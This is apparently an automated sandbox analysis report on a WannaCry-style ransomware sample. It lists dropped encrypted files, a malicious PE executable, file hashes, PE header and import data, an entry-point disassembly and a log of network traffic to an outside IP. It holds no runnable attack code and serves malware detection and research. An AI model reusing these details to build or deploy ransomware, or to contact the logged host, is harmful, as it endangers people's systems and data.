                                Preview:WANACRY!.......L..P.1~J.+.......o.5.+...R..|..I$Uq....hJ.E.`g..{..(.}0..6.4...v.|..Qj...c=9.......3U..Ga.cE.8...W..dS.!.)..W...S.'..:..?..L..D.....#S[.$..!.....p.......c.9...ro...,.^....D........<0e...a.....I..7.Q....*..,..bs8...=..*"Z.};'A...j..5Q.>...................d9..."M...NC7...^.!.y..A..MBH0..#0.....Dc.....O;I.Xu.........../P.|/.e...;....{..S.............i.?c.2..kr.]...'(.7...........=.a..xZYT.....).FYR6..J.Y....e...+..j Q.9..V....#^O..z..os.0..;..NG.j....V.|.,...........j.3..>.[.....k9>.Y..W...5...@.J..._...g..vs..Q.3.!..p.Og..v.p...h...Q....f...@J....&X.......%=..@5.7r.1P.3./....1.|P[.............<... ..>.}*...!..u...3..D.j.&.B.Z..JegT.X..^i.c.4qd.wq.X...p....rk.Q..^....+..D.BW.DI..0..eB(..43..@./_...E.....Wt..H1.^.....{..~7..0.d..|..<.......q....D^3Ra@s.g...l.(?.d8.V..S.8;.k".'.+......W5....P.........eF.Z2..:A.mBt.0.,.{L'.Yr.D....m ..xH...Q..g.?.....Q.....r.N.....g.s?..A.[L..&.. .;"#x.@..`2z./}.'|.jrJ.Q#.?..*os..x..m.*..K...C
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):111896
                                Entropy (8bit):7.998372837712669
                                Encrypted:true
                                SSDEEP:3072:ZQaF1ufXWGbWRbUdMyp/WB1Uej89+bA4IqY1+6P:VKfG1RIGy4J8cbDMx
                                MD5:24A7F07AD15AF8C25BACE944A2BE380E
                                SHA1:3EBF6EBEF7EE01EB6E15A523F6B2A1F53E01405E
                                SHA-256:57486111BCA5E3D113F7B112DECBB1DC80A2FFD37D2565DAEB8D79DE1E0851C3
                                SHA-512:6B931E2AAEEBF864A4432CFE50FF37A83FB21825FA610E1F2D42A765127E806EB80AD33C430163D1C13EC09F3D4EABAE389692D3159810E7244825938ED594AA
                                Malicious:true
                                Reputation:unknown
                                Preview:WANACRY!....7-...YE9.n.;..s;ml.....#...!...9N......a..P..s............c.M.1.&SS.<.SE{..s...z0.v.5..j*G.J.>;....L/.El.".Vn..g;V.K....CFyJi....>....L$...:.....j.'u7..+|ZGf....x.o..6'K...^..9..`3\.y..[.Rh.g..w.>....vC//_..i..{..Y..a.@*.&d...zr.%.3.....9/................^vl.C.@..O.90..F4.~x.<IF.e..:[?"..G5...D...7Y.4..*.,W.i..g..I.PTn...rcA.n..%T|.f......;.&]........r..E..Y..C.......-p.-XX.v.E..C...].{].6....yvl..}-b."D..u^P.t.(.t.w.u:(..}.Hr......H....v...?...|[....t....(./..>.OR..hk@...nY..-Q.g...K{..%....#.qA....O.......w..~....#t.2T.#.....z."...?...{. ...j0 ...[......O.....T.a(.k..TmL..(}....+.ka.i.0./..A<.#.?. ...w<P......g..3A.fI..`.x.....?n.@...B...r.\]Fz....7>..A...o.&.h..6.!..>...P.....TX%{N.?v...zO..Hs.Q_p..rQ.."{+.U..)Q.Q.[...#cw."U...5s..C.....k..J.._....FV....v.f.r6.r.. ....Z.:/=dw....s.j8X._0@...oy.vJB."...d..5..34]...U#...D..~..R..I....j....'R....q.....k.x.|.J.F.i6.V.G......}X...o[.....l.E.6N.....s.B........AQ:.0.!.Y.....1=.y}.F..
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:PC bitmap, Windows 3.x format, 800 x 600 x 24, image size 1440000, resolution 3779 x 3779 px/m, cbSize 1440054, bits offset 54
                                Category:dropped
                                Size (bytes):1440054
                                Entropy (8bit):0.3363393123555661
                                Encrypted:false
                                SSDEEP:384:zYzuP4tiuOub2WuzvqOFgjexqO5XgYWTIWv/+:sbL+
                                MD5:C17170262312F3BE7027BC2CA825BF0C
                                SHA1:F19ECEDA82973239A1FDC5826BCE7691E5DCB4FB
                                SHA-256:D5E0E8694DDC0548D8E6B87C83D50F4AB85C1DEBADB106D6A6A794C3E746F4FA
                                SHA-512:C6160FD03AD659C8DD9CF2A83F9FDCD34F2DB4F8F27F33C5AFD52ACED49DFA9CE4909211C221A0479DBBB6E6C985385557C495FC04D3400FF21A0FBBAE42EE7C
                                Malicious:false
                                Reputation:unknown
                                Preview:BM6.......6...(... ...X.................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                Category:dropped
                                Size (bytes):245760
                                Entropy (8bit):6.278920408390635
                                Encrypted:false
                                SSDEEP:3072:Rmrhd5U1eigWcR+uiUg6p4FLlG4tlL8z+mmCeHFZjoHEo3m:REd5+IZiZhLlG4AimmCo
                                MD5:7BF2B57F2A205768755C07F238FB32CC
                                SHA1:45356A9DD616ED7161A3B9192E2F318D0AB5AD10
                                SHA-256:B9C5D4339809E0AD9A00D4D3DD26FDF44A32819A54ABF846BB9B560D81391C25
                                SHA-512:91A39E919296CB5C6ECCBA710B780519D90035175AA460EC6DBE631324E5E5753BD8D87F395B5481BCD7E1AD623B31A34382D81FAAE06BEF60EC28B49C3122A9
                                Malicious:true
                                Antivirus:
                                • Antivirus: ReversingLabs, Detection: 96%
                                Reputation:unknown
                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......%...a...a...a......b.......u.......`.....d.......j.......e...W...b...a.......W...s.......`...Richa...................PE..L.....[J.................@...p.......1.......P....@..................................................................................0..|............................................................................P...............................text....3.......@.................. ..`.rdata..h....P.......P..............@..@.data....2.......0..................@....rsrc...|....0....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:PC bitmap, Windows 3.x format, 800 x 600 x 24, image size 1440000, resolution 3779 x 3779 px/m, cbSize 1440054, bits offset 54
                                Category:dropped
                                Size (bytes):1440054
                                Entropy (8bit):0.3363393123555661
                                Encrypted:false
                                SSDEEP:384:zYzuP4tiuOub2WuzvqOFgjexqO5XgYWTIWv/+:sbL+
                                MD5:C17170262312F3BE7027BC2CA825BF0C
                                SHA1:F19ECEDA82973239A1FDC5826BCE7691E5DCB4FB
                                SHA-256:D5E0E8694DDC0548D8E6B87C83D50F4AB85C1DEBADB106D6A6A794C3E746F4FA
                                SHA-512:C6160FD03AD659C8DD9CF2A83F9FDCD34F2DB4F8F27F33C5AFD52ACED49DFA9CE4909211C221A0479DBBB6E6C985385557C495FC04D3400FF21A0FBBAE42EE7C
                                Malicious:false
                                Reputation:unknown
                                Preview:BM6.......6...(... ...X.................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                Category:dropped
                                Size (bytes):245760
                                Entropy (8bit):6.278920408390635
                                Encrypted:false
                                SSDEEP:3072:Rmrhd5U1eigWcR+uiUg6p4FLlG4tlL8z+mmCeHFZjoHEo3m:REd5+IZiZhLlG4AimmCo
                                MD5:7BF2B57F2A205768755C07F238FB32CC
                                SHA1:45356A9DD616ED7161A3B9192E2F318D0AB5AD10
                                SHA-256:B9C5D4339809E0AD9A00D4D3DD26FDF44A32819A54ABF846BB9B560D81391C25
                                SHA-512:91A39E919296CB5C6ECCBA710B780519D90035175AA460EC6DBE631324E5E5753BD8D87F395B5481BCD7E1AD623B31A34382D81FAAE06BEF60EC28B49C3122A9
                                Malicious:true
                                Antivirus:
                                • Antivirus: ReversingLabs, Detection: 96%
                                Reputation:unknown
                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......%...a...a...a......b.......u.......`.....d.......j.......e...W...b...a.......W...s.......`...Richa...................PE..L.....[J.................@...p.......1.......P....@..................................................................................0..|............................................................................P...............................text....3.......@.................. ..`.rdata..h....P.......P..............@..@.data....2.......0..................@....rsrc...|....0....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................
                                Process:C:\Windows\SysWOW64\wbem\WMIC.exe
                                File Type:ASCII text, with CRLF, CR line terminators
                                Category:dropped
                                Size (bytes):48
                                Entropy (8bit):4.305255793112395
                                Encrypted:false
                                SSDEEP:3:8yzGc7C1RREal:nzGtRV
                                MD5:6ED2062D4FB53D847335AE403B23BE62
                                SHA1:C3030ED2C3090594869691199F46BE7A9A12E035
                                SHA-256:43B5390113DCBFA597C4AAA154347D72F660DB5F2A0398EB3C1D35793E8220B9
                                SHA-512:C9C302215394FEC0B38129280A8303E0AF46BA71B75672665D89828C6F68A54E18430F953CE36B74F50DC0F658CA26AC3572EA60F9E6714AFFC9FB623E3C54FC
                                Malicious:false
                                Reputation:unknown
                                Preview:ERROR:...Description = Initialization failure...
                                File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                Entropy (8bit):7.995470941164686
                                TrID:
                                • Win32 Executable (generic) a (10002005/4) 99.96%
                                • Generic Win/DOS Executable (2004/3) 0.02%
                                • DOS Executable Generic (2002/1) 0.02%
                                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                File name:2N2jefqo8e.exe
                                File size:3514368
                                MD5:84c82835a5d21bbcf75a61706d8ab549
                                SHA1:5ff465afaabcbf0150d1a3ab2c2e74f3a4426467
                                SHA256:ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa
                                SHA512:90723a50c20ba3643d625595fd6be8dcf88d70ff7f4b4719a88f055d5b3149a4231018ea30d375171507a147e59f73478c0c27948590794554d031e7d54b7244
                                SSDEEP:98304:QqPoBhz1aRxcSUDk36SAEdhvxWa9P593R8yAVp2g3x:QqPe1Cxcxk3ZAEUadzR8yc4gB
                                TLSH:73F533F4E221B7ACF2550EF64855C59B6A9724B2EBEF1E26DA8001A70D44F7F8FC0491
                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........:...T...T...T...X...T..._...T.'.Z...T...^...T...P...T.g.....T...U...T..._...T.c.R...T.Rich..T.........................PE..L..
                                Icon Hash:00828e8e8686b000
                                Entrypoint:0x4077ba
                                Entrypoint Section:.text
                                Digitally signed:false
                                Imagebase:0x400000
                                Subsystem:windows gui
                                Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                DLL Characteristics:
                                Time Stamp:0x4CE78F41 [Sat Nov 20 09:05:05 2010 UTC]
                                TLS Callbacks:
                                CLR (.Net) Version:
                                OS Version Major:4
                                OS Version Minor:0
                                File Version Major:4
                                File Version Minor:0
                                Subsystem Version Major:4
                                Subsystem Version Minor:0
                                Import Hash:68f013d7437aa653a8a98a05807afeb1
                                Instruction
                                push ebp
                                mov ebp, esp
                                push FFFFFFFFh
                                push 0040D488h
                                push 004076F4h
                                mov eax, dword ptr fs:[00000000h]
                                push eax
                                mov dword ptr fs:[00000000h], esp
                                sub esp, 68h
                                push ebx
                                push esi
                                push edi
                                mov dword ptr [ebp-18h], esp
                                xor ebx, ebx
                                mov dword ptr [ebp-04h], ebx
                                push 00000002h
                                call dword ptr [004081C4h]
                                pop ecx
                                or dword ptr [0040F94Ch], FFFFFFFFh
                                or dword ptr [0040F950h], FFFFFFFFh
                                call dword ptr [004081C0h]
                                mov ecx, dword ptr [0040F948h]
                                mov dword ptr [eax], ecx
                                call dword ptr [004081BCh]
                                mov ecx, dword ptr [0040F944h]
                                mov dword ptr [eax], ecx
                                mov eax, dword ptr [004081B8h]
                                mov eax, dword ptr [eax]
                                mov dword ptr [0040F954h], eax
                                call 00007F56F918C81Bh
                                cmp dword ptr [0040F870h], ebx
                                jne 00007F56F918C70Eh
                                push 0040793Ch
                                call dword ptr [004081B4h]
                                pop ecx
                                call 00007F56F918C7EDh
                                push 0040E00Ch
                                push 0040E008h
                                call 00007F56F918C7D8h
                                mov eax, dword ptr [0040F940h]
                                mov dword ptr [ebp-6Ch], eax
                                lea eax, dword ptr [ebp-6Ch]
                                push eax
                                push dword ptr [0040F93Ch]
                                lea eax, dword ptr [ebp-64h]
                                push eax
                                lea eax, dword ptr [ebp-70h]
                                push eax
                                lea eax, dword ptr [ebp-60h]
                                push eax
                                call dword ptr [004081ACh]
                                push 0040E004h
                                push 0040E000h
                                call 00007F56F918C7A5h
                                Programming Language:
                                • [C++] VS98 (6.0) SP6 build 8804
                                • [EXP] VC++ 6.0 SP5 build 8804
                                Name | Virtual Address | Virtual Size | Is in Section
                                IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                                IMAGE_DIRECTORY_ENTRY_IMPORT | 0xd5a8 | 0x64 | .rdata
                                IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x10000 | 0x349fa0 | .rsrc
                                IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                                IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                                IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
                                IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                                IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                                IMAGE_DIRECTORY_ENTRY_IAT | 0x8000 | 0x1d8 | .rdata
                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
                                IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
                                Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                                .text | 0x1000 | 0x69b0 | 0x7000 | False | 0.5747419084821429 | data | 6.404235106100747 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                .rdata | 0x8000 | 0x5f70 | 0x6000 | False | 0.5781656901041666 | data | 6.66357096840794 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                .data | 0xe000 | 0x1958 | 0x2000 | False | 0.394287109375 | Matlab v4 mat-file (little endian) ry, numeric, rows 0, columns 0 | 4.4557495078691405 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                .rsrc | 0x10000 | 0x349fa0 | 0x34a000 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                Name | RVA | Size | Type | Language | Country
                                XIA | 0x100f0 | 0x349635 | Zip archive data, at least v2.0 to extract, compression method=deflate | English | United States
                                RT_VERSION | 0x359728 | 0x388 | data | English | United States
                                RT_MANIFEST | 0x359ab0 | 0x4ef | exported SGML document, ASCII text, with CRLF line terminators | English | United States
                                DLL | Import
                                KERNEL32.dll | GetFileAttributesW, GetFileSizeEx, CreateFileA, InitializeCriticalSection, DeleteCriticalSection, ReadFile, GetFileSize, WriteFile, LeaveCriticalSection, EnterCriticalSection, SetFileAttributesW, SetCurrentDirectoryW, CreateDirectoryW, GetTempPathW, GetWindowsDirectoryW, GetFileAttributesA, SizeofResource, LockResource, LoadResource, MultiByteToWideChar, Sleep, OpenMutexA, GetFullPathNameA, CopyFileA, GetModuleFileNameA, VirtualAlloc, VirtualFree, FreeLibrary, HeapAlloc, GetProcessHeap, GetModuleHandleA, SetLastError, VirtualProtect, IsBadReadPtr, HeapFree, SystemTimeToFileTime, LocalFileTimeToFileTime, CreateDirectoryA, GetStartupInfoA, SetFilePointer, SetFileTime, GetComputerNameW, GetCurrentDirectoryA, SetCurrentDirectoryA, GlobalAlloc, LoadLibraryA, GetProcAddress, GlobalFree, CreateProcessA, CloseHandle, WaitForSingleObject, TerminateProcess, GetExitCodeProcess, FindResourceA
                                USER32.dll | wsprintfA
                                ADVAPI32.dll | CreateServiceA, OpenServiceA, StartServiceA, CloseServiceHandle, CryptReleaseContext, RegCreateKeyW, RegSetValueExA, RegQueryValueExA, RegCloseKey, OpenSCManagerA
                                MSVCRT.dll | realloc, fclose, fwrite, fread, fopen, sprintf, rand, srand, strcpy, memset, strlen, wcscat, wcslen, __CxxFrameHandler, ??3@YAXPAX@Z, memcmp, _except_handler3, _local_unwind2, wcsrchr, swprintf, ??2@YAPAXI@Z, memcpy, strcmp, strrchr, __p___argv, __p___argc, _stricmp, free, malloc, ??0exception@@QAE@ABV0@@Z, ??1exception@@UAE@XZ, ??0exception@@QAE@ABQBD@Z, _CxxThrowException, calloc, strcat, _mbsstr, ??1type_info@@UAE@XZ, _exit, _XcptFilter, exit, _acmdln, __getmainargs, _initterm, __setusermatherr, _adjust_fdiv, __p__commode, __p__fmode, __set_app_type, _controlfp
                                Language of compilation system | Country where language is spoken | Map
                                English | United States |
                                Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                Jan 31, 2023 16:15:09.389415979 CET4982480192.168.11.20171.25.193.9
                                Jan 31, 2023 16:15:09.389472008 CET8049824171.25.193.9192.168.11.20
                                Jan 31, 2023 16:15:09.389527082 CET8049824171.25.193.9192.168.11.20
                                Jan 31, 2023 16:15:09.389583111 CET8049824171.25.193.9192.168.11.20
                                Jan 31, 2023 16:15:09.389589071 CET4982480192.168.11.20171.25.193.9
                                Jan 31, 2023 16:15:09.389653921 CET8049824171.25.193.9192.168.11.20
                                Jan 31, 2023 16:15:09.389707088 CET8049824171.25.193.9192.168.11.20
                                Jan 31, 2023 16:15:09.389755011 CET4982480192.168.11.20171.25.193.9
                                Jan 31, 2023 16:15:09.389779091 CET8049824171.25.193.9192.168.11.20
                                Jan 31, 2023 16:15:09.389832973 CET8049824171.25.193.9192.168.11.20
                                Jan 31, 2023 16:15:09.389885902 CET8049824171.25.193.9192.168.11.20
                                Jan 31, 2023 16:15:09.389928102 CET4982480192.168.11.20171.25.193.9
                                Jan 31, 2023 16:15:09.389928102 CET4982480192.168.11.20171.25.193.9
                                Jan 31, 2023 16:15:09.389929056 CET4982480192.168.11.20171.25.193.9
                                Jan 31, 2023 16:15:09.389929056 CET4982480192.168.11.20171.25.193.9
                                Jan 31, 2023 16:15:09.389988899 CET8049824171.25.193.9192.168.11.20
                                Jan 31, 2023 16:15:09.390043974 CET8049824171.25.193.9192.168.11.20
                                Jan 31, 2023 16:15:09.390100002 CET8049824171.25.193.9192.168.11.20
                                Jan 31, 2023 16:15:09.390106916 CET4982480192.168.11.20171.25.193.9
                                Jan 31, 2023 16:15:09.390106916 CET4982480192.168.11.20171.25.193.9
                                Jan 31, 2023 16:15:09.390178919 CET8049824171.25.193.9192.168.11.20
                                Jan 31, 2023 16:15:09.390233040 CET8049824171.25.193.9192.168.11.20
                                Jan 31, 2023 16:15:09.390265942 CET4982480192.168.11.20171.25.193.9
                                Jan 31, 2023 16:15:09.390265942 CET4982480192.168.11.20171.25.193.9
                                Jan 31, 2023 16:15:09.390316010 CET8049824171.25.193.9192.168.11.20
                                Jan 31, 2023 16:15:09.390369892 CET8049824171.25.193.9192.168.11.20
                                Jan 31, 2023 16:15:09.390422106 CET8049824171.25.193.9192.168.11.20
                                Jan 31, 2023 16:15:09.390506029 CET8049824171.25.193.9192.168.11.20
                                Jan 31, 2023 16:15:09.390562057 CET8049824171.25.193.9192.168.11.20
                                Jan 31, 2023 16:15:09.390604973 CET4982480192.168.11.20171.25.193.9
                                Jan 31, 2023 16:15:09.390604973 CET4982480192.168.11.20171.25.193.9
                                Jan 31, 2023 16:15:09.390644073 CET8049824171.25.193.9192.168.11.20
                                Jan 31, 2023 16:15:09.390697956 CET8049824171.25.193.9192.168.11.20
                                Jan 31, 2023 16:15:09.390749931 CET8049824171.25.193.9192.168.11.20
                                Jan 31, 2023 16:15:09.390810966 CET8049824171.25.193.9192.168.11.20
                                Jan 31, 2023 16:15:09.390863895 CET8049824171.25.193.9192.168.11.20
                                Jan 31, 2023 16:15:09.390916109 CET8049824171.25.193.9192.168.11.20
                                Jan 31, 2023 16:15:09.390983105 CET8049824171.25.193.9192.168.11.20
                                Jan 31, 2023 16:15:09.391036987 CET8049824171.25.193.9192.168.11.20
                                Jan 31, 2023 16:15:09.391089916 CET8049824171.25.193.9192.168.11.20
                                Jan 31, 2023 16:15:09.391113997 CET4982480192.168.11.20171.25.193.9
                                Jan 31, 2023 16:15:09.391283989 CET4982480192.168.11.20171.25.193.9
                                Jan 31, 2023 16:15:09.391623020 CET4982480192.168.11.20171.25.193.9
                                Jan 31, 2023 16:15:09.432256937 CET8049824171.25.193.9192.168.11.20
                                Jan 31, 2023 16:15:09.432413101 CET8049824171.25.193.9192.168.11.20
                                Jan 31, 2023 16:15:09.432485104 CET8049824171.25.193.9192.168.11.20
                                Jan 31, 2023 16:15:09.432550907 CET8049824171.25.193.9192.168.11.20
                                Jan 31, 2023 16:15:09.432605982 CET8049824171.25.193.9192.168.11.20
                                Jan 31, 2023 16:15:09.432657957 CET8049824171.25.193.9192.168.11.20
                                Jan 31, 2023 16:15:09.432682037 CET4982480192.168.11.20171.25.193.9
                                Jan 31, 2023 16:15:09.432748079 CET8049824171.25.193.9192.168.11.20
                                Jan 31, 2023 16:15:09.432806015 CET8049824171.25.193.9192.168.11.20
                                Jan 31, 2023 16:15:09.432851076 CET4982480192.168.11.20171.25.193.9
                                Jan 31, 2023 16:15:09.432851076 CET4982480192.168.11.20171.25.193.9
                                Jan 31, 2023 16:15:09.432892084 CET8049824171.25.193.9192.168.11.20
                                Jan 31, 2023 16:15:09.432948112 CET8049824171.25.193.9192.168.11.20
                                Jan 31, 2023 16:15:09.433001041 CET8049824171.25.193.9192.168.11.20
                                Jan 31, 2023 16:15:09.433021069 CET4982480192.168.11.20171.25.193.9
                                Jan 31, 2023 16:15:09.433021069 CET4982480192.168.11.20171.25.193.9
                                Jan 31, 2023 16:15:09.433085918 CET8049824171.25.193.9192.168.11.20
                                Jan 31, 2023 16:15:09.433139086 CET8049824171.25.193.9192.168.11.20
                                Jan 31, 2023 16:15:09.433195114 CET8049824171.25.193.9192.168.11.20
                                Jan 31, 2023 16:15:09.433202982 CET4982480192.168.11.20171.25.193.9
                                Jan 31, 2023 16:15:09.433202982 CET4982480192.168.11.20171.25.193.9
                                Jan 31, 2023 16:15:09.433275938 CET8049824171.25.193.9192.168.11.20
                                Jan 31, 2023 16:15:09.433331966 CET8049824171.25.193.9192.168.11.20
                                Jan 31, 2023 16:15:09.433360100 CET4982480192.168.11.20171.25.193.9
                                Jan 31, 2023 16:15:09.433360100 CET4982480192.168.11.20171.25.193.9
                                Jan 31, 2023 16:15:09.433418036 CET8049824171.25.193.9192.168.11.20
                                Jan 31, 2023 16:15:09.433471918 CET8049824171.25.193.9192.168.11.20
                                Jan 31, 2023 16:15:09.433527946 CET8049824171.25.193.9192.168.11.20
                                Jan 31, 2023 16:15:09.433535099 CET4982480192.168.11.20171.25.193.9
                                Jan 31, 2023 16:15:09.433598995 CET8049824171.25.193.9192.168.11.20
                                Jan 31, 2023 16:15:09.433653116 CET8049824171.25.193.9192.168.11.20
                                Jan 31, 2023 16:15:09.433700085 CET4982480192.168.11.20171.25.193.9
                                Jan 31, 2023 16:15:09.433727980 CET8049824171.25.193.9192.168.11.20
                                Jan 31, 2023 16:15:09.433784962 CET8049824171.25.193.9192.168.11.20
                                Jan 31, 2023 16:15:09.433839083 CET8049824171.25.193.9192.168.11.20
                                Jan 31, 2023 16:15:09.433871031 CET4982480192.168.11.20171.25.193.9
                                Jan 31, 2023 16:15:09.433871031 CET4982480192.168.11.20171.25.193.9
                                Jan 31, 2023 16:15:09.433871031 CET4982480192.168.11.20171.25.193.9
                                Jan 31, 2023 16:15:09.433932066 CET8049824171.25.193.9192.168.11.20
                                Jan 31, 2023 16:15:09.433986902 CET8049824171.25.193.9192.168.11.20
                                Jan 31, 2023 16:15:09.434041977 CET8049824171.25.193.9192.168.11.20
                                Jan 31, 2023 16:15:09.434048891 CET4982480192.168.11.20171.25.193.9
                                Jan 31, 2023 16:15:09.434113026 CET8049824171.25.193.9192.168.11.20
                                Jan 31, 2023 16:15:09.434168100 CET8049824171.25.193.9192.168.11.20
                                Jan 31, 2023 16:15:09.434210062 CET4982480192.168.11.20171.25.193.9
                                Jan 31, 2023 16:15:09.434210062 CET4982480192.168.11.20171.25.193.9
                                Jan 31, 2023 16:15:09.434248924 CET8049824171.25.193.9192.168.11.20
                                Jan 31, 2023 16:15:09.434386015 CET4982480192.168.11.20171.25.193.9
                                Jan 31, 2023 16:15:09.434386015 CET4982480192.168.11.20171.25.193.9
                                Jan 31, 2023 16:15:09.434407949 CET8049824171.25.193.9192.168.11.20
                                Jan 31, 2023 16:15:09.434412956 CET8049824171.25.193.9192.168.11.20
                                Jan 31, 2023 16:15:09.434454918 CET8049824171.25.193.9192.168.11.20
                                Jan 31, 2023 16:15:09.434509039 CET8049824171.25.193.9192.168.11.20
                                Jan 31, 2023 16:15:09.434550047 CET4982480192.168.11.20171.25.193.9
                                Jan 31, 2023 16:15:09.434587002 CET8049824171.25.193.9192.168.11.20
                                Jan 31, 2023 16:15:09.434642076 CET8049824171.25.193.9192.168.11.20
                                Jan 31, 2023 16:15:09.434695005 CET8049824171.25.193.9192.168.11.20
                                Jan 31, 2023 16:15:09.434720039 CET4982480192.168.11.20171.25.193.9
                                Jan 31, 2023 16:15:09.434772015 CET8049824171.25.193.9192.168.11.20
                                Jan 31, 2023 16:15:09.434827089 CET8049824171.25.193.9192.168.11.20
                                Jan 31, 2023 16:15:09.434880018 CET8049824171.25.193.9192.168.11.20
                                Jan 31, 2023 16:15:09.434887886 CET4982480192.168.11.20171.25.193.9
                                Jan 31, 2023 16:15:09.434952974 CET8049824171.25.193.9192.168.11.20
                                Jan 31, 2023 16:15:09.435005903 CET8049824171.25.193.9192.168.11.20
                                Jan 31, 2023 16:15:09.435061932 CET8049824171.25.193.9192.168.11.20
                                Jan 31, 2023 16:15:09.435069084 CET4982480192.168.11.20171.25.193.9
                                Jan 31, 2023 16:15:09.435132980 CET8049824171.25.193.9192.168.11.20
                                Jan 31, 2023 16:15:09.435185909 CET8049824171.25.193.9192.168.11.20
                                Jan 31, 2023 16:15:09.435245991 CET8049824171.25.193.9192.168.11.20
                                Jan 31, 2023 16:15:09.435298920 CET8049824171.25.193.9192.168.11.20
                                Jan 31, 2023 16:15:09.435353041 CET8049824171.25.193.9192.168.11.20
                                Jan 31, 2023 16:15:09.435398102 CET4982480192.168.11.20171.25.193.9
                                Jan 31, 2023 16:15:09.435422897 CET8049824171.25.193.9192.168.11.20
                                Jan 31, 2023 16:15:09.435477972 CET8049824171.25.193.9192.168.11.20
                                Jan 31, 2023 16:15:09.435529947 CET8049824171.25.193.9192.168.11.20
                                Jan 31, 2023 16:15:09.435570002 CET4982480192.168.11.20171.25.193.9
                                Jan 31, 2023 16:15:09.435605049 CET8049824171.25.193.9192.168.11.20
                                Jan 31, 2023 16:15:09.435659885 CET8049824171.25.193.9192.168.11.20
                                Jan 31, 2023 16:15:09.435713053 CET8049824171.25.193.9192.168.11.20
                                Jan 31, 2023 16:15:09.435740948 CET4982480192.168.11.20171.25.193.9
                                Jan 31, 2023 16:15:09.435740948 CET4982480192.168.11.20171.25.193.9
                                Jan 31, 2023 16:15:09.435798883 CET8049824171.25.193.9192.168.11.20
                                Jan 31, 2023 16:15:09.435853004 CET8049824171.25.193.9192.168.11.20
                                Jan 31, 2023 16:15:09.435909033 CET8049824171.25.193.9192.168.11.20
                                Jan 31, 2023 16:15:09.435914993 CET4982480192.168.11.20171.25.193.9
                                Jan 31, 2023 16:15:09.435978889 CET8049824171.25.193.9192.168.11.20
                                Jan 31, 2023 16:15:09.436033010 CET8049824171.25.193.9192.168.11.20
                                Jan 31, 2023 16:15:09.436079025 CET4982480192.168.11.20171.25.193.9
                                Jan 31, 2023 16:15:09.436104059 CET8049824171.25.193.9192.168.11.20
                                Jan 31, 2023 16:15:09.436157942 CET8049824171.25.193.9192.168.11.20
                                Jan 31, 2023 16:15:09.436211109 CET8049824171.25.193.9192.168.11.20
                                Jan 31, 2023 16:15:09.436278105 CET8049824171.25.193.9192.168.11.20
                                Jan 31, 2023 16:15:09.436372995 CET8049824171.25.193.9192.168.11.20
                                Jan 31, 2023 16:15:09.436420918 CET4982480192.168.11.20171.25.193.9
                                Jan 31, 2023 16:15:09.436459064 CET8049824171.25.193.9192.168.11.20
                                Jan 31, 2023 16:15:09.436512947 CET8049824171.25.193.9192.168.11.20
                                Jan 31, 2023 16:15:09.436568022 CET8049824171.25.193.9192.168.11.20
                                Jan 31, 2023 16:15:09.436592102 CET4982480192.168.11.20171.25.193.9
                                Jan 31, 2023 16:15:09.436592102 CET4982480192.168.11.20171.25.193.9
                                Jan 31, 2023 16:15:09.436592102 CET4982480192.168.11.20171.25.193.9
                                Jan 31, 2023 16:15:09.436593056 CET4982480192.168.11.20171.25.193.9
                                Jan 31, 2023 16:15:09.436671019 CET8049824171.25.193.9192.168.11.20
                                Jan 31, 2023 16:15:09.436724901 CET8049824171.25.193.9192.168.11.20
                                Jan 31, 2023 16:15:09.436758995 CET4982480192.168.11.20171.25.193.9
                                Jan 31, 2023 16:15:09.436800003 CET8049824171.25.193.9192.168.11.20
                                Jan 31, 2023 16:15:09.436855078 CET8049824171.25.193.9192.168.11.20
